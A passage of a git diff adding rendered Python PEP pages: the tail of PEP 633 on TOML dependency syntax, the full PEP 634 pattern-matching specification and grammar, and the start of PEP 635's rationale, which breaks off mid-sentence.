aiohttp = { version = ">= 3.6.1", markers = "python_version >= '3.8'" }
+
+
+

A slightly extended example of the above, where a particular version of aiohttp is required based on the interpreter version.

+
aiohttp >= 3.6.1; python_version >= '3.8'
+aiohttp >= 3.0.0, < 3.6.1; python_version < '3.8'
+
+
+
aiohttp = [
+    { version = ">= 3.6.1", markers = "python_version >= '3.8'" },
+    { version = ">= 3.0.0, < 3.6.1", markers = "python_version < '3.8'" }
+]
+
+
+
+
+

Package Extras

+

Specifying dependency for a package extra

+
aiohttp >= 3.6.2; extra == 'http'
+
+
+
aiohttp = { version = ">= 3.6.2", for-extra = "http" }
+
+
+

Using extras from a dependency

+
aiohttp [speedups] >= 3.6.2
+
+
+
aiohttp = { version = ">= 3.6.2", extras = ["speedups"] }
+
+
+
+
+

Complex Examples

+

Version Constraint

+
aiohttp [speedups] >= 3.6.2; python_version >= '3.8' and extra == 'http'
+
+
+
aiohttp = { version = ">= 3.6.2", extras = ["speedups"], markers = "python_version >= '3.8'", for-extra = "http" }
+
+
+

Direct Reference (VCS)

+
aiohttp [speedups] @ git+ssh://git@github.com/aio-libs/aiohttp.git@master ; python_version >= '3.8' and extra == 'http'
+
+
+
aiohttp = { git = "ssh://git@github.com/aio-libs/aiohttp.git", revision = "master", extras = ["speedups"], markers = "python_version >= '3.8'", for-extra = "http" }
+
+
+
+
+
+

Rejected Ideas

+
+

Switch to an array for dependencies

+

Use an array instead of a table in order to have each element only be a table +(with a name key) and no arrays of requirement tables. This was very +verbose and restrictive in the TOML format, and having multiple requirements +for a given distribution isn’t very common.

+
+
+

Replace optional-dependencies with extras

+

Remove the optional-dependencies table in favour of both including an +optional key in the requirement and an extras table which specifies +which (optional) requirements are needed for a project’s extra. This reduces +the number of table with the same specification (to 1) and allows for +requirements to be specified once but used in multiple extras, but distances +some of the requirement’s properties (which extra(s) it belongs to), groups +required and optional dependencies together (possibly mixed), and there may not +be a simple way to choose a requirement when a distribution has multiple +requirements. This was rejected as optional-dependencies has already been +used in the PEP 621 draft.

+
+
+

direct table in requirement

+

Include the direct-reference keys in a direct table, have the VCS specified +as the value of a vcs key. This was more explicit and easier to include in +a JSON-schema validation, but was decided to be too verbose and not as +readable.

+
+
+

Include hash

+

Include hash in direct-reference requirements. This was only for package +lock-files, and didn’t really have a place in the project’s metadata.

+
+
+

Dependency tables for each extra

+

Have the optional-dependencies be a table of dependency tables for each +extra, with the table name being the extra’s name. This made +optional-dependencies a different type (table of tables of requirements) +from dependencies (table of requirements), which could be jarring for users +and harder to parse.

+
+
+

Environment marker keys

+

Make each PEP 508 environment marker as a key (or child-table key) in +the requirement. This arguably increases readability and ease of parsing. +The markers key would still be allowed for more advanced specification, +with which the key-specified environment markers are and’d with the +result of. This was deferred as more design needs to be undertaken.

+
+
+

Multiple extras which one requirement can satisfy

+

Replace the for-extra key with for-extras, with the value being an +array of extras which the requirement satisfies. This reduces some +duplication, but in this case that duplication makes explicit which extras +have which dependencies.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0633.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0634/index.html b/pep-0634/index.html new file mode 100644 index 00000000000..c83c2375eca --- /dev/null +++ b/pep-0634/index.html @@ -0,0 +1,756 @@ + + + + + + + + PEP 634 – Structural Pattern Matching: Specification | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 634 – Structural Pattern Matching: Specification

+
+
Author:
+
Brandt Bucher <brandt at python.org>, +Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
22-Oct-2020, 08-Feb-2021
+
Replaces:
+
622
+
Resolution:
+
Python-Committers message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at The match statement.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP provides the technical specification for the match +statement. It replaces PEP 622, which is hereby split in three parts:

+ +

This PEP is intentionally devoid of commentary; the motivation and all +explanations of our design choices are in PEP 635. First-time readers +are encouraged to start with PEP 636, which provides a gentler +introduction to the concepts, syntax and semantics of patterns.

+
+
+

Syntax and Semantics

+

See Appendix A for the complete grammar.

+
+

Overview and Terminology

+

The pattern matching process takes as input a pattern (following +case) and a subject value (following match). Phrases to +describe the process include “the pattern is matched with (or against) +the subject value” and “we match the pattern against (or with) the +subject value”.

+

The primary outcome of pattern matching is success or failure. In +case of success we may say “the pattern succeeds”, “the match +succeeds”, or “the pattern matches the subject value”.

+

In many cases a pattern contains subpatterns, and success or failure +is determined by the success or failure of matching those subpatterns +against the value (e.g., for OR patterns) or against parts of the +value (e.g., for sequence patterns). This process typically processes +the subpatterns from left to right until the overall outcome is +determined. E.g., an OR pattern succeeds at the first succeeding +subpattern, while a sequence patterns fails at the first failing +subpattern.

+

A secondary outcome of pattern matching may be one or more name +bindings. We may say “the pattern binds a value to a name”. When +subpatterns tried until the first success, only the bindings due to +the successful subpattern are valid; when trying until the first +failure, the bindings are merged. Several more rules, explained +below, apply to these cases.

+
+
+

The Match Statement

+

Syntax:

+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' star_named_expressions?
+    | named_expression
+case_block: "case" patterns [guard] ':' block
+guard: 'if' named_expression
+
+
+

The rules star_named_expression, star_named_expressions, +named_expression and block are part of the standard Python +grammar.

+

The rule patterns is specified below.

+

For context, match_stmt is a new alternative for +compound_statement:

+
compound_statement:
+    | if_stmt
+    ...
+    | match_stmt
+
+
+

The match and case keywords are soft keywords, i.e. they are +not reserved words in other grammatical contexts (including at the +start of a line if there is no colon where expected). This implies +that they are recognized as keywords when part of a match +statement or case block only, and are allowed to be used in all +other contexts as variable or argument names.

+
+

Match Semantics

+

The match statement first evaluates the subject expression. If a +comma is present a tuple is constructed using the standard rules.

+

The resulting subject value is then used to select the first case +block whose patterns succeeds matching it and whose guard condition +(if present) is “truthy”. If no case blocks qualify the match +statement is complete; otherwise, the block of the selected case block +is executed. The usual rules for executing a block nested inside a +compound statement apply (e.g. an if statement).

+

Name bindings made during a successful pattern match outlive the +executed block and can be used after the match statement.

+

During failed pattern matches, some subpatterns may succeed. For +example, while matching the pattern (0, x, 1) with the value [0, +1, 2], the subpattern x may succeed if the list elements are +matched from left to right. The implementation may choose to either +make persistent bindings for those partial matches or not. User code +including a match statement should not rely on the bindings being +made for a failed match, but also shouldn’t assume that variables are +unchanged by a failed match. This part of the behavior is left +intentionally unspecified so different implementations can add +optimizations, and to prevent introducing semantic restrictions that +could limit the extensibility of this feature.

+

The precise pattern binding rules vary per pattern type and are +specified below.

+
+
+

Guards

+

If a guard is present on a case block, once the pattern or patterns in +the case block succeed, the expression in the guard is evaluated. If +this raises an exception, the exception bubbles up. Otherwise, if the +condition is “truthy” the case block is selected; if it is “falsy” the +case block is not selected.

+

Since guards are expressions they are allowed to have side effects. +Guard evaluation must proceed from the first to the last case block, +one at a time, skipping case blocks whose pattern(s) don’t all +succeed. (I.e., even if determining whether those patterns succeed +may happen out of order, guard evaluation must happen in order.) +Guard evaluation must stop once a case block is selected.

+
+
+

Irrefutable case blocks

+

A pattern is considered irrefutable if we can prove from its syntax +alone that it will always succeed. In particular, capture patterns +and wildcard patterns are irrefutable, and so are AS patterns whose +left-hand side is irrefutable, OR patterns containing at least +one irrefutable pattern, and parenthesized irrefutable patterns.

+

A case block is considered irrefutable if it has no guard and its +pattern is irrefutable.

+

A match statement may have at most one irrefutable case block, and it +must be last.

+
+
+
+

Patterns

+

The top-level syntax for patterns is as follows:

+
patterns: open_sequence_pattern | pattern
+pattern: as_pattern | or_pattern
+as_pattern: or_pattern 'as' capture_pattern
+or_pattern: '|'.closed_pattern+
+closed_pattern:
+    | literal_pattern
+    | capture_pattern
+    | wildcard_pattern
+    | value_pattern
+    | group_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+
+
+
+

AS Patterns

+

Syntax:

+
as_pattern: or_pattern 'as' capture_pattern
+
+
+

(Note: the name on the right may not be _.)

+

An AS pattern matches the OR pattern on the left of the as +keyword against the subject. If this fails, the AS pattern fails. +Otherwise, the AS pattern binds the subject to the name on the right +of the as keyword and succeeds.

+
+
+

OR Patterns

+

Syntax:

+
or_pattern: '|'.closed_pattern+
+
+
+

When two or more patterns are separated by vertical bars (|), +this is called an OR pattern. (A single closed pattern is just that.)

+

Only the final subpattern may be irrefutable.

+

Each subpattern must bind the same set of names.

+

An OR pattern matches each of its subpatterns in turn to the subject, +until one succeeds. The OR pattern is then deemed to succeed. +If none of the subpatterns succeed the OR pattern fails.

+
+
+

Literal Patterns

+

Syntax:

+
literal_pattern:
+    | signed_number
+    | signed_number '+' NUMBER
+    | signed_number '-' NUMBER
+    | strings
+    | 'None'
+    | 'True'
+    | 'False'
+signed_number: NUMBER | '-' NUMBER
+
+
+

The rule strings and the token NUMBER are defined in the +standard Python grammar.

+

Triple-quoted strings are supported. Raw strings and byte strings +are supported. F-strings are not supported.

+

The forms signed_number '+' NUMBER and signed_number '-' +NUMBER are only permitted to express complex numbers; they require a +real number on the left and an imaginary number on the right.

+

A literal pattern succeeds if the subject value compares equal to the +value expressed by the literal, using the following comparisons rules:

+
    +
  • Numbers and strings are compared using the == operator.
  • +
  • The singleton literals None, True and False are compared +using the is operator.
  • +
+
+
+

Capture Patterns

+

Syntax:

+
capture_pattern: !"_" NAME
+
+
+

The single underscore (_) is not a capture pattern (this is what +!"_" expresses). It is treated as a wildcard pattern.

+

A capture pattern always succeeds. It binds the subject value to the +name using the scoping rules for name binding established for the +walrus operator in PEP 572. (Summary: the name becomes a local +variable in the closest containing function scope unless there’s an +applicable nonlocal or global statement.)

+

In a given pattern, a given name may be bound only once. This +disallows for example case x, x: ... but allows case [x] | x: +....

+
+
+

Wildcard Pattern

+

Syntax:

+
wildcard_pattern: "_"
+
+
+

A wildcard pattern always succeeds. It binds no name.

+
+
+

Value Patterns

+

Syntax:

+
value_pattern: attr
+attr: name_or_attr '.' NAME
+name_or_attr: attr | NAME
+
+
+

The dotted name in the pattern is looked up using the standard Python +name resolution rules. However, when the same value pattern occurs +multiple times in the same match statement, the interpreter may cache +the first value found and reuse it, rather than repeat the same +lookup. (To clarify, this cache is strictly tied to a given execution +of a given match statement.)

+

The pattern succeeds if the value found thus compares equal to the +subject value (using the == operator).

+
+
+

Group Patterns

+

Syntax:

+
group_pattern: '(' pattern ')'
+
+
+

(For the syntax of pattern, see Patterns above. Note that it +contains no comma – a parenthesized series of items with at least one +comma is a sequence pattern, as is ().)

+

A parenthesized pattern has no additional syntax. It allows users to +add parentheses around patterns to emphasize the intended grouping.

+
+
+

Sequence Patterns

+

Syntax:

+
sequence_pattern:
+  | '[' [maybe_sequence_pattern] ']'
+  | '(' [open_sequence_pattern] ')'
+open_sequence_pattern: maybe_star_pattern ',' [maybe_sequence_pattern]
+maybe_sequence_pattern: ','.maybe_star_pattern+ ','?
+maybe_star_pattern: star_pattern | pattern
+star_pattern: '*' (capture_pattern | wildcard_pattern)
+
+
+

(Note that a single parenthesized pattern without a trailing comma is +a group pattern, not a sequence pattern. However a single pattern +enclosed in [...] is still a sequence pattern.)

+

There is no semantic difference between a sequence pattern using +[...], a sequence pattern using (...), and an open sequence +pattern.

+

A sequence pattern may contain at most one star subpattern. The star +subpattern may occur in any position. If no star subpattern is +present, the sequence pattern is a fixed-length sequence pattern; +otherwise it is a variable-length sequence pattern.

+

For a sequence pattern to succeed the subject must be a sequence, +where being a sequence is defined as its class being one of the following:

+
    +
  • a class that inherits from collections.abc.Sequence
  • +
  • a Python class that has been registered as a collections.abc.Sequence
  • +
  • a builtin class that has its Py_TPFLAGS_SEQUENCE bit set
  • +
  • a class that inherits from any of the above (including classes defined before a +parent’s Sequence registration)
  • +
+

The following standard library classes will have their Py_TPFLAGS_SEQUENCE +bit set:

+
    +
  • array.array
  • +
  • collections.deque
  • +
  • list
  • +
  • memoryview
  • +
  • range
  • +
  • tuple
  • +
+
+

Note

+

Although str, bytes, and bytearray are usually +considered sequences, they are not included in the above list and do +not match sequence patterns.

+
+

A fixed-length sequence pattern fails if the length of the subject +sequence is not equal to the number of subpatterns.

+

A variable-length sequence pattern fails if the length of the subject +sequence is less than the number of non-star subpatterns.

+

The length of the subject sequence is obtained using the builtin +len() function (i.e., via the __len__ protocol). However, the +interpreter may cache this value in a similar manner as described for +value patterns.

+

A fixed-length sequence pattern matches the subpatterns to +corresponding items of the subject sequence, from left to right. +Matching stops (with a failure) as soon as a subpattern fails. If all +subpatterns succeed in matching their corresponding item, the sequence +pattern succeeds.

+

A variable-length sequence pattern first matches the leading non-star +subpatterns to the corresponding items of the subject sequence, as for +a fixed-length sequence. If this succeeds, the star subpattern +matches a list formed of the remaining subject items, with items +removed from the end corresponding to the non-star subpatterns +following the star subpattern. The remaining non-star subpatterns are +then matched to the corresponding subject items, as for a fixed-length +sequence.

+
+
+

Mapping Patterns

+

Syntax:

+
mapping_pattern: '{' [items_pattern] '}'
+items_pattern: ','.key_value_pattern+ ','?
+key_value_pattern:
+    | (literal_pattern | value_pattern) ':' pattern
+    | double_star_pattern
+double_star_pattern: '**' capture_pattern
+
+
+

(Note that **_ is disallowed by this syntax.)

+

A mapping pattern may contain at most one double star pattern, +and it must be last.

+

A mapping pattern may not contain duplicate key values. +(If all key patterns are literal patterns this is considered a +syntax error; otherwise this is a runtime error and will +raise ValueError.)

+

For a mapping pattern to succeed the subject must be a mapping, +where being a mapping is defined as its class being one of the following:

+
    +
  • a class that inherits from collections.abc.Mapping
  • +
  • a Python class that has been registered as a collections.abc.Mapping
  • +
  • a builtin class that has its Py_TPFLAGS_MAPPING bit set
  • +
  • a class that inherits from any of the above (including classes defined before a +parent’s Mapping registration)
  • +
+

The standard library classes dict and mappingproxy will have their Py_TPFLAGS_MAPPING +bit set.

+

A mapping pattern succeeds if every key given in the mapping pattern +is present in the subject mapping, and the pattern for +each key matches the corresponding item of the subject mapping. Keys +are always compared with the == operator. If a '**' +NAME form is present, that name is bound to a dict containing +remaining key-value pairs from the subject mapping.

+

If duplicate keys are detected in the mapping pattern, the pattern is +considered invalid, and a ValueError is raised.

+

Key-value pairs are matched using the two-argument form of the +subject’s get() method. As a consequence, matched key-value pairs +must already be present in the mapping, and not created on-the-fly by +__missing__ or __getitem__. For example, +collections.defaultdict instances will only be matched by patterns +with keys that were already present when the match statement was +entered.

+
+
+

Class Patterns

+

Syntax:

+
class_pattern:
+    | name_or_attr '(' [pattern_arguments ','?] ')'
+pattern_arguments:
+    | positional_patterns [',' keyword_patterns]
+    | keyword_patterns
+positional_patterns: ','.pattern+
+keyword_patterns: ','.keyword_pattern+
+keyword_pattern: NAME '=' pattern
+
+
+

A class pattern may not repeat the same keyword multiple times.

+

If name_or_attr is not an instance of the builtin type, +TypeError is raised.

+

A class pattern fails if the subject is not an instance of name_or_attr. +This is tested using isinstance().

+

If no arguments are present, the pattern succeeds if the isinstance() +check succeeds. Otherwise:

+
    +
  • If only keyword patterns are present, they are processed as follows, +one by one:
      +
    • The keyword is looked up as an attribute on the subject.
        +
      • If this raises an exception other than AttributeError, +the exception bubbles up.
      • +
      • If this raises AttributeError the class pattern fails.
      • +
      • Otherwise, the subpattern associated with the keyword is matched +against the attribute value. If this fails, the class pattern fails. +If it succeeds, the match proceeds to the next keyword.
      • +
      +
    • +
    • If all keyword patterns succeed, the class pattern as a whole succeeds.
    • +
    +
  • +
  • If any positional patterns are present, they are converted to keyword +patterns (see below) and treated as additional keyword patterns, +preceding the syntactic keyword patterns (if any).
  • +
+

Positional patterns are converted to keyword patterns using the +__match_args__ attribute on the class designated by name_or_attr, +as follows:

+
    +
  • For a number of built-in types (specified below), +a single positional subpattern is accepted which will match +the entire subject. (Keyword patterns work as for other types here.)
  • +
  • The equivalent of getattr(cls, "__match_args__", ())) is called.
  • +
  • If this raises an exception the exception bubbles up.
  • +
  • If the returned value is not a tuple, the conversion fails +and TypeError is raised.
  • +
  • If there are more positional patterns than the length of +__match_args__ (as obtained using len()), TypeError is raised.
  • +
  • Otherwise, positional pattern i is converted to a keyword pattern +using __match_args__[i] as the keyword, +provided it the latter is a string; +if it is not, TypeError is raised.
  • +
  • For duplicate keywords, TypeError is raised.
  • +
+

Once the positional patterns have been converted to keyword patterns, +the match proceeds as if there were only keyword patterns.

+

As mentioned above, for the following built-in types the handling of +positional subpatterns is different: +bool, bytearray, bytes, dict, float, +frozenset, int, list, set, str, and tuple.

+

This behavior is roughly equivalent to the following:

+
class C:
+    __match_args__ = ("__match_self_prop__",)
+    @property
+    def __match_self_prop__(self):
+        return self
+
+
+
+
+
+
+

Side Effects and Undefined Behavior

+

The only side-effect produced explicitly by the matching process is +the binding of names. However, the process relies on attribute +access, instance checks, len(), equality and item access on the +subject and some of its components. It also evaluates value +patterns and the class name of class patterns. While none of those +typically create any side-effects, in theory they could. This +proposal intentionally leaves out any specification of what methods +are called or how many times. This behavior is therefore undefined +and user code should not rely on it.

+

Another undefined behavior is the binding of variables by capture +patterns that are followed (in the same case block) by another pattern +that fails. These may happen earlier or later depending on the +implementation strategy, the only constraint being that capture +variables must be set before guards that use them explicitly are +evaluated. If a guard consists of an and clause, evaluation of +the operands may even be interspersed with pattern matching, as long +as left-to-right evaluation order is maintained.

+
+
+

The Standard Library

+

To facilitate the use of pattern matching, several changes will be +made to the standard library:

+
    +
  • Namedtuples and dataclasses will have auto-generated +__match_args__.
  • +
  • For dataclasses the order of attributes in the generated +__match_args__ will be the same as the order of corresponding +arguments in the generated __init__() method. This includes the +situations where attributes are inherited from a superclass. Fields +with init=False are excluded from __match_args__.
  • +
+

In addition, a systematic effort will be put into going through +existing standard library classes and adding __match_args__ where +it looks beneficial.

+
+
+

Appendix A – Full Grammar

+

Here is the full grammar for match_stmt. This is an additional +alternative for compound_stmt. Remember that match and +case are soft keywords, i.e. they are not reserved words in other +grammatical contexts (including at the start of a line if there is no +colon where expected). By convention, hard keywords use single quotes +while soft keywords use double quotes.

+

Other notation used beyond standard EBNF:

+
    +
  • SEP.RULE+ is shorthand for RULE (SEP RULE)*
  • +
  • !RULE is a negative lookahead assertion
  • +
+
match_stmt: "match" subject_expr ':' NEWLINE INDENT case_block+ DEDENT
+subject_expr:
+    | star_named_expression ',' [star_named_expressions]
+    | named_expression
+case_block: "case" patterns [guard] ':' block
+guard: 'if' named_expression
+
+patterns: open_sequence_pattern | pattern
+pattern: as_pattern | or_pattern
+as_pattern: or_pattern 'as' capture_pattern
+or_pattern: '|'.closed_pattern+
+closed_pattern:
+    | literal_pattern
+    | capture_pattern
+    | wildcard_pattern
+    | value_pattern
+    | group_pattern
+    | sequence_pattern
+    | mapping_pattern
+    | class_pattern
+
+literal_pattern:
+    | signed_number !('+' | '-')
+    | signed_number '+' NUMBER
+    | signed_number '-' NUMBER
+    | strings
+    | 'None'
+    | 'True'
+    | 'False'
+signed_number: NUMBER | '-' NUMBER
+
+capture_pattern: !"_" NAME !('.' | '(' | '=')
+
+wildcard_pattern: "_"
+
+value_pattern: attr !('.' | '(' | '=')
+attr: name_or_attr '.' NAME
+name_or_attr: attr | NAME
+
+group_pattern: '(' pattern ')'
+
+sequence_pattern:
+  | '[' [maybe_sequence_pattern] ']'
+  | '(' [open_sequence_pattern] ')'
+open_sequence_pattern: maybe_star_pattern ',' [maybe_sequence_pattern]
+maybe_sequence_pattern: ','.maybe_star_pattern+ ','?
+maybe_star_pattern: star_pattern | pattern
+star_pattern: '*' (capture_pattern | wildcard_pattern)
+
+mapping_pattern: '{' [items_pattern] '}'
+items_pattern: ','.key_value_pattern+ ','?
+key_value_pattern:
+    | (literal_pattern | value_pattern) ':' pattern
+    | double_star_pattern
+double_star_pattern: '**' capture_pattern
+
+class_pattern:
+    | name_or_attr '(' [pattern_arguments ','?] ')'
+pattern_arguments:
+    | positional_patterns [',' keyword_patterns]
+    | keyword_patterns
+positional_patterns: ','.pattern+
+keyword_patterns: ','.keyword_pattern+
+keyword_pattern: NAME '=' pattern
+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0634.rst

+

Last modified: 2023-12-11 05:40:56 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0635/index.html b/pep-0635/index.html new file mode 100644 index 00000000000..d663cedc147 --- /dev/null +++ b/pep-0635/index.html @@ -0,0 +1,1306 @@ + + + + + + + + PEP 635 – Structural Pattern Matching: Motivation and Rationale | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 635 – Structural Pattern Matching: Motivation and Rationale

+
+
Author:
+
Tobias Kohn <kohnt at tobiaskohn.ch>, +Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+

+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
12-Sep-2020
+
Python-Version:
+
3.10
+
Post-History:
+
22-Oct-2020, 08-Feb-2021
+
Resolution:
+
Python-Committers message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP provides the motivation and rationale for PEP 634 +(“Structural Pattern Matching: Specification”). First-time readers +are encouraged to start with PEP 636, which provides a gentler +introduction to the concepts, syntax and semantics of patterns.

+
+
+

Motivation

+

(Structural) pattern matching syntax is found in many languages, from +Haskell, Erlang and Scala to Elixir and Ruby. (A proposal for +JavaScript is also under consideration.)

+

Python already supports a limited form of this through sequence +unpacking assignments, which the new proposal leverages.

+

Several other common Python idioms are also relevant:

+
    +
  • The if ... elif ... elif ... else idiom is often used to find +out the type or shape of an object in an ad-hoc fashion, using one +or more checks like isinstance(x, cls), hasattr(x, "attr"), +len(x) == n or "key" in x as guards to select an applicable +block. The block can then assume x supports the interface +checked by the guard. For example:
    if isinstance(x, tuple) and len(x) == 2:
    +    host, port = x
    +    mode = "http"
    +elif isinstance(x, tuple) and len(x) == 3:
    +    host, port, mode = x
    +# Etc.
    +
    +
    +

    Code like this is more elegantly rendered using match:

    +
    match x:
    +    case host, port:
    +        mode = "http"
    +    case host, port, mode:
    +        pass
    +    # Etc.
    +
    +
    +
  • +
  • AST traversal code often looks for nodes matching a given pattern, +for example the code to detect a node of the shape “A + B * C” might +look like this:
    if (isinstance(node, BinOp) and node.op == "+"
    +        and isinstance(node.right, BinOp) and node.right.op == "*"):
    +    a, b, c = node.left, node.right.left, node.right.right
    +    # Handle a + b*c
    +
    +
    +

    Using match this becomes more readable:

    +
    match node:
    +    case BinOp("+", a, BinOp("*", b, c)):
    +        # Handle a + b*c
    +
    +
    +
  • +
+

We believe that adding pattern matching to Python will enable Python +users to write cleaner, more readable code for examples like those +above, and many others.

+

For a more academic discussion to this proposal, see [1].

+
+

Pattern Matching and OO

+

Pattern matching is complimentary to the object-oriented paradigm. +Using OO and inheritance we can easily define a method on a base class +that defines default behavior for a specific operation on that class, +and we can override this default behavior in subclasses. We can also +use the Visitor pattern to separate actions from data.

+

But this is not sufficient for all situations. For example, a code +generator may consume an AST, and have many operations where the +generated code needs to vary based not just on the class of a node, +but also on the value of some class attributes, like the BinOp +example above. The Visitor pattern is insufficiently flexible for +this: it can only select based on the class.

+

See a complete example.

+

Like the Visitor pattern, pattern matching allows for a strict separation +of concerns: specific actions or data processing is independent of the +class hierarchy or manipulated objects. When dealing with predefined or +even built-in classes, in particular, it is often impossible to add further +methods to the individual classes. Pattern matching not only relieves the +programmer or class designer from the burden of the boilerplate code needed +for the Visitor pattern, but is also flexible enough to directly work with +built-in types. It naturally distinguishes between sequences of different +lengths, which might all share the same class despite obviously differing +structures. Moreover, pattern matching automatically takes inheritance +into account: a class D inheriting from C will be handled by a pattern +that targets C by default.

+

Object oriented programming is geared towards single-dispatch: it is a +single instance (or the type thereof) that determines which method is to +be called. This leads to a somewhat artificial situation in case of binary +operators where both objects might play an equal role in deciding which +implementation to use (Python addresses this through the use of reversed +binary methods). Pattern matching is structurally better suited to handle +such situations of multi-dispatch, where the action to be taken depends on +the types of several objects to equal parts.

+
+
+

Patterns and Functional Style

+

Many Python applications and libraries are not written in a consistent +OO style – unlike Java, Python encourages defining functions at the +top-level of a module, and for simple data structures, tuples (or +named tuples or lists) and dictionaries are often used exclusively or +mixed with classes or data classes.

+

Pattern matching is particularly suitable for picking apart such data +structures. As an extreme example, it’s easy to write code that picks +a JSON data structure using match:

+
match json_pet:
+    case {"type": "cat", "name": name, "pattern": pattern}:
+        return Cat(name, pattern)
+    case {"type": "dog", "name": name, "breed": breed}:
+        return Dog(name, breed)
+    case _:
+        raise ValueError("Not a suitable pet")
+
+
+

Functional programming generally prefers a declarative style with a focus +on relationships in data. Side effects are avoided whenever possible. +Pattern matching thus naturally fits and highly supports functional +programming style.

+
+
+
+

Rationale

+

This section provides the rationale for individual design decisions. +It takes the place of “Rejected ideas” in the standard PEP format. +It is organized in sections corresponding to the specification (PEP 634).

+
+

Overview and Terminology

+

Much of the power of pattern matching comes from the nesting of subpatterns. +That the success of a pattern match depends directly on the success of +subpattern is thus a cornerstone of the design. However, although a +pattern like P(Q(), R()) succeeds only if both subpatterns Q() +and R() succeed (i.e. the success of pattern P depends on Q +and R), the pattern P is checked first. If P fails, neither +Q() nor R() will be tried (this is a direct consequence of the +fact that if P fails, there are no subjects to match against Q() +and R() in the first place).

+

Also note that patterns bind names to values rather than performing an +assignment. This reflects the fact that patterns aim to not have side +effects, which also means that Capture or AS patterns cannot assign a +value to an attribute or subscript. We thus consistently use the term +‘bind’ instead of ‘assign’ to emphasise this subtle difference between +traditional assignments and name binding in patterns.

+
+
+

The Match Statement

+

The match statement evaluates an expression to produce a subject, finds the +first pattern that matches the subject, and executes the associated block +of code. Syntactically, the match statement thus takes an expression and +a sequence of case clauses, where each case clause comprises a pattern and +a block of code.

+

Since case clauses comprise a block of code, they adhere to the existing +indentation scheme with the syntactic structure of +<keyword> ...: <(indented) block>, which resembles a compound +statement. The keyword case reflects its widespread use in +pattern matching languages, ignoring those languages that use other +syntactic means such as a symbol like |, because it would not fit +established Python structures. The syntax of patterns following the +keyword is discussed below.

+

Given that the case clauses follow the structure of a compound statement, +the match statement itself naturally becomes a compound statement itself +as well, following the same syntactic structure. This naturally leads to +match <expr>: <case_clause>+. Note that the match statement determines +a quasi-scope in which the evaluated subject is kept alive (although not in +a local variable), similar to how a with statement might keep a resource +alive during execution of its block. Furthermore, control flows from the +match statement to a case clause and then leaves the block of the match +statement. The block of the match statement thus has both syntactic and +semantic meaning.

+

Various suggestions have sought to eliminate or avoid the naturally arising +“double indentation” of a case clause’s code block. Unfortunately, all such +proposals of flat indentation schemes come at the expense of violating +Python’s established structural paradigm, leading to additional syntactic +rules:

+
    +
  • Unindented case clauses. +The idea is to align case clauses with the match, i.e.:
    match expression:
    +case pattern_1:
    +    ...
    +case pattern_2:
    +    ...
    +
    +
    +

    This may look awkward to the eye of a Python programmer, because +everywhere else a colon is followed by an indent. The match would +neither follow the syntactic scheme of simple nor composite statements +but rather establish a category of its own.

    +
  • +
  • Putting the expression on a separate line after “match”. +The idea is to use the expression yielding the subject as a statement +to avoid the singularity of match having no actual block despite +the colons:
    match:
    +    expression
    +case pattern_1:
    +    ...
    +case pattern_2:
    +    ...
    +
    +
    +

    This was ultimately rejected because the first block would be another +novelty in Python’s grammar: a block whose only content is a single +expression rather than a sequence of statements. Attempts to amend this +issue by adding or repurposing yet another keyword along the lines of +match: return expression did not yield any satisfactory solution.

    +
  • +
+

Although flat indentation would save some horizontal space, the cost of +increased complexity or unusual rules is too high. It would also complicate +life for simple-minded code editors. Finally, the horizontal space issue can +be alleviated by allowing “half-indent” (i.e. two spaces instead of four) +for match statements (though we do not recommend this).

+

In sample programs using match, written as part of the development of this +PEP, a noticeable improvement in code brevity is observed, more than making +up for the additional indentation level.

+

Statement vs. Expression. Some suggestions centered around the idea of +making match an expression rather than a statement. However, this +would fit poorly with Python’s statement-oriented nature and lead to +unusually long and complex expressions and the need to invent new +syntactic constructs or break well established syntactic rules. An +obvious consequence of match as an expression would be that case +clauses could no longer have arbitrary blocks of code attached, but only +a single expression. Overall, the strong limitations could in no way +offset the slight simplification in some special use cases.

+

Hard vs. Soft Keyword. There were options to make match a hard keyword, +or choose a different keyword. Although using a hard keyword would simplify +life for simple-minded syntax highlighters, we decided not to use hard +keyword for several reasons:

+
    +
  • Most importantly, the new parser doesn’t require us to do this. Unlike +with async that caused hardships with being a soft keyword for few +releases, here we can make match a permanent soft keyword.
  • +
  • match is so commonly used in existing code, that it would break +almost every existing program and will put a burden to fix code on many +people who may not even benefit from the new syntax.
  • +
  • It is hard to find an alternative keyword that would not be commonly used +in existing programs as an identifier, and would still clearly reflect the +meaning of the statement.
  • +
+

Use “as” or “|” instead of “case” for case clauses. +The pattern matching proposed here is a combination of multi-branch control +flow (in line with switch in Algol-derived languages or cond in Lisp) +and object-deconstruction as found in functional languages. While the proposed +keyword case highlights the multi-branch aspect, alternative keywords such +as as would equally be possible, highlighting the deconstruction aspect. +as or with, for instance, also have the advantage of already being +keywords in Python. However, since case as a keyword can only occur as a +leading keyword inside a match statement, it is easy for a parser to +distinguish between its use as a keyword or as a variable.

+

Other variants would use a symbol like | or =>, or go entirely without +special marker.

+

